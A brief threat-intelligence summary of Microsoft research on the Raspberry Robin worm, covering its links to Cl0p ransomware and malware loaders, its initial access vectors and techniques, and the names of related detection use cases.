The Rapid Growth of Raspberry Robin Malware

Category: Threat Actor Activity | Industry: N/A | Level: Tactical | Source: Microsoft

From exploring the web of activity associated with the Raspberry Robin worm, researchers from Microsoft's Security Threat Intelligence team have discovered a group tracked as DEV-0243 has used the worm to deploy Cl0p ransomware. Activity associated with Raspberry Robin has risen based on Microsoft's telemetry "3,000 devices in almost 1,000 organizations have seen at least one Raspberry Robin payload-related alert in the last 30 days." Utilization of the malware has developed significantly since it was first reported by Red Canary, and has had no post-exploitation actions. However, now that it has grown as a popular malware distribution, it's been used for a variety of campaigns and can be used in tandem to deploy popular malware loaders such as BumbleBee, IcedID, and Truebot. Various initial access vectors are used by the malware including USB infection, malicious ADs often posing as fake updates, and phishing. Techniques commonly used with Raspberry Robin have included LNK shortcut files triggering commands with CMD, abusing MSIexec to download and install malicious packages, as well as the use of several living-off-the-land binaries (LOLBins). In the cybercrime ecosystem, Raspberry Robin plays a role for initial access brokers to obtain credentials for sale and threat actors utilizing the malware for complete ransomware operations.

Anvilogic Scenario:

• Raspberry Robin Abuses MsiExec

Anvilogic Use Cases:

• Symbolic OR Hard File Link Created
• Suspicious Executable by CMD.exe
• Msiexec Abuse

‍